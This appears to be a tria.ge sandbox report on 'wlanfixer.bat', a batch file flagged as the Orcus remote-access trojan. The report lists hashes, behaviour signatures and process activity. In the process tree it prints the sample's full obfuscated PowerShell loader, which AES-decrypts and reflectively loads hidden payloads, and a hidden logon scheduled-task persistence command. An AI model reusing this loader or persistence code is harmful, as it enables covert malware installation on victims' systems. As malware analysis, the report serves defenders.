Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system -
submitted
23/04/2024, 13:04
Static task
static1
Behavioral task
behavioral1
Sample
wlanfixer.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
wlanfixer.bat
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
wlanfixer.bat
Resource
win10v2004-20240412-en
General
-
Target
wlanfixer.bat
-
Size
3.5MB
-
MD5
45730c9d81cdc2677ea2bd082eb79edb
-
SHA1
7ece7b975ab6506d83dac94f685e2cedbe56dd6b
-
SHA256
31f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4
-
SHA512
d4504b96971c71e38207b56ada95f5e78f8536aaa88a3cbeebaa16627ff548f620672c0d4c61e74707fdc2662ec99584b5dc8d6e3fa1b7056f9595531422b687
-
SSDEEP
49152:mR8s3zr/pxAN80OHguszxrEC/agxlnUrLvlKNNwI:d
Malware Config
Signatures
-
Orcurs Rat Executable 1 IoCs
resource yara_rule behavioral4/memory/1596-53-0x000001FCD6DE0000-0x000001FCD70DA000-memory.dmp orcus -
Blocklisted process makes network request 11 IoCs
flow pid Process 1 1596 powershell.exe 2 1596 powershell.exe 5 1596 powershell.exe 6 1596 powershell.exe 7 1596 powershell.exe 8 1596 powershell.exe 9 1596 powershell.exe 11 1596 powershell.exe 12 1596 powershell.exe 13 1596 powershell.exe 14 1596 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2718508534-2116753757-2794822388-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4192 powershell.exe 4192 powershell.exe 3696 powershell.exe 3696 powershell.exe 1596 powershell.exe 1596 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4192 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeIncreaseQuotaPrivilege 3696 powershell.exe Token: SeSecurityPrivilege 3696 powershell.exe Token: SeTakeOwnershipPrivilege 3696 powershell.exe Token: SeLoadDriverPrivilege 3696 powershell.exe Token: SeSystemProfilePrivilege 3696 powershell.exe Token: SeSystemtimePrivilege 3696 powershell.exe Token: SeProfSingleProcessPrivilege 3696 powershell.exe Token: SeIncBasePriorityPrivilege 3696 powershell.exe Token: SeCreatePagefilePrivilege 3696 powershell.exe Token: SeBackupPrivilege 3696 powershell.exe Token: SeRestorePrivilege 3696 powershell.exe Token: SeShutdownPrivilege 3696 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeSystemEnvironmentPrivilege 3696 powershell.exe Token: SeRemoteShutdownPrivilege 3696 powershell.exe Token: SeUndockPrivilege 3696 powershell.exe Token: SeManageVolumePrivilege 3696 powershell.exe Token: 33 3696 powershell.exe Token: 34 3696 powershell.exe Token: 35 3696 powershell.exe Token: 36 3696 powershell.exe Token: SeIncreaseQuotaPrivilege 3696 powershell.exe Token: SeSecurityPrivilege 3696 powershell.exe Token: SeTakeOwnershipPrivilege 3696 powershell.exe Token: SeLoadDriverPrivilege 3696 powershell.exe Token: SeSystemProfilePrivilege 3696 powershell.exe Token: SeSystemtimePrivilege 3696 powershell.exe Token: SeProfSingleProcessPrivilege 3696 powershell.exe Token: SeIncBasePriorityPrivilege 3696 powershell.exe Token: SeCreatePagefilePrivilege 3696 powershell.exe Token: SeBackupPrivilege 3696 powershell.exe Token: SeRestorePrivilege 3696 powershell.exe Token: SeShutdownPrivilege 3696 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeSystemEnvironmentPrivilege 3696 powershell.exe Token: SeRemoteShutdownPrivilege 3696 powershell.exe Token: SeUndockPrivilege 3696 powershell.exe Token: SeManageVolumePrivilege 3696 powershell.exe Token: 33 3696 powershell.exe Token: 34 3696 powershell.exe Token: 35 3696 powershell.exe Token: 36 3696 powershell.exe Token: SeIncreaseQuotaPrivilege 3696 powershell.exe Token: SeSecurityPrivilege 3696 powershell.exe Token: SeTakeOwnershipPrivilege 3696 powershell.exe Token: SeLoadDriverPrivilege 3696 powershell.exe Token: SeSystemProfilePrivilege 3696 powershell.exe Token: SeSystemtimePrivilege 3696 powershell.exe Token: SeProfSingleProcessPrivilege 3696 powershell.exe Token: SeIncBasePriorityPrivilege 3696 powershell.exe Token: SeCreatePagefilePrivilege 3696 powershell.exe Token: SeBackupPrivilege 3696 powershell.exe Token: SeRestorePrivilege 3696 powershell.exe Token: SeShutdownPrivilege 3696 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeSystemEnvironmentPrivilege 3696 powershell.exe Token: SeRemoteShutdownPrivilege 3696 powershell.exe Token: SeUndockPrivilege 3696 powershell.exe Token: SeManageVolumePrivilege 3696 powershell.exe Token: 33 3696 powershell.exe Token: 34 3696 powershell.exe Token: 35 3696 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1596 powershell.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1596 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 564 wrote to memory of 4192 564 cmd.exe 81 PID 564 wrote to memory of 4192 564 cmd.exe 81 PID 4192 wrote to memory of 3696 4192 powershell.exe 82 PID 4192 wrote to memory of 3696 4192 powershell.exe 82 PID 4192 wrote to memory of 2360 4192 powershell.exe 85 PID 4192 wrote to memory of 2360 4192 powershell.exe 85 PID 2360 wrote to memory of 1240 2360 WScript.exe 86 PID 2360 wrote to memory of 1240 2360 WScript.exe 86 PID 1240 wrote to memory of 1596 1240 cmd.exe 88 PID 1240 wrote to memory of 1596 1240 cmd.exe 88
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wlanfixer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RoF8A1JenCTYvN5F1s7vRkzErCsX+lTeTh7sYe5+YqQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p+fhmC+G5ORMSHe10ZC4cg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CViub=New-Object System.IO.MemoryStream(,$param_var); $bMvnM=New-Object System.IO.MemoryStream; $IwWYG=New-Object System.IO.Compression.GZipStream($CViub, [IO.Compression.CompressionMode]::Decompress); $IwWYG.CopyTo($bMvnM); $IwWYG.Dispose(); $CViub.Dispose(); $bMvnM.Dispose(); $bMvnM.ToArray();}function execute_function($param_var,$param2_var){ $vQMJY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GYRaA=$vQMJY.EntryPoint; $GYRaA.Invoke($null, $param2_var);}$uwemL = 'C:\Users\Admin\AppData\Local\Temp\wlanfixer.bat';$host.UI.RawUI.WindowTitle = $uwemL;$WQdbL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uwemL).Split([Environment]::NewLine);foreach ($CKiFo in $WQdbL) { if ($CKiFo.StartsWith(':: ')) { $vOqbs=$CKiFo.Substring(3); break; }}$payloads_var=[string[]]$vOqbs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_816_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_816.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3696
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_816.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_816.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RoF8A1JenCTYvN5F1s7vRkzErCsX+lTeTh7sYe5+YqQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p+fhmC+G5ORMSHe10ZC4cg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CViub=New-Object System.IO.MemoryStream(,$param_var); $bMvnM=New-Object System.IO.MemoryStream; $IwWYG=New-Object System.IO.Compression.GZipStream($CViub, [IO.Compression.CompressionMode]::Decompress); $IwWYG.CopyTo($bMvnM); $IwWYG.Dispose(); $CViub.Dispose(); $bMvnM.Dispose(); $bMvnM.ToArray();}function execute_function($param_var,$param2_var){ $vQMJY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GYRaA=$vQMJY.EntryPoint; $GYRaA.Invoke($null, $param2_var);}$uwemL = 'C:\Users\Admin\AppData\Roaming\startup_str_816.bat';$host.UI.RawUI.WindowTitle = $uwemL;$WQdbL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uwemL).Split([Environment]::NewLine);foreach ($CKiFo in $WQdbL) { if ($CKiFo.StartsWith(':: ')) { $vOqbs=$CKiFo.Substring(3); break; }}$payloads_var=[string[]]$vOqbs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1596
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD5fc96ab0084537b88924da4116fa8943e
SHA1836ebcefd0448d4a65aa28de527cbdf566176189
SHA256648b2a209ff053ed8373fbeb61d16686daf21bd19b7f1bdf6324aa1b807a8ed0
SHA512aec7cad1d3f12e915fbe6d78f8c1cea1ba79fc7c8e48584f166b911184c5dfd7c9432072093fb430907501934feaff6e4d07daeaf280bc9b3d603aac9459c05c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.5MB
MD545730c9d81cdc2677ea2bd082eb79edb
SHA17ece7b975ab6506d83dac94f685e2cedbe56dd6b
SHA25631f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4
SHA512d4504b96971c71e38207b56ada95f5e78f8536aaa88a3cbeebaa16627ff548f620672c0d4c61e74707fdc2662ec99584b5dc8d6e3fa1b7056f9595531422b687
-
Filesize
115B
MD5c3f65a5cc97aab9f7782b85751635c80
SHA110baccdc10c4a1e0626f16792825695e3ee7cc72
SHA25694c95a9f53a3f37f7c18ed6652d6d4e26daa77165172329cf6e8295bc9035a46
SHA512f8baf91b5ae962c41a228009eb40e454876a71b9b65f37bc9a82cc76a6e29b16c7150008904f8369098d406f85cf3f587f610004ac58746e42ff6c1688d134ea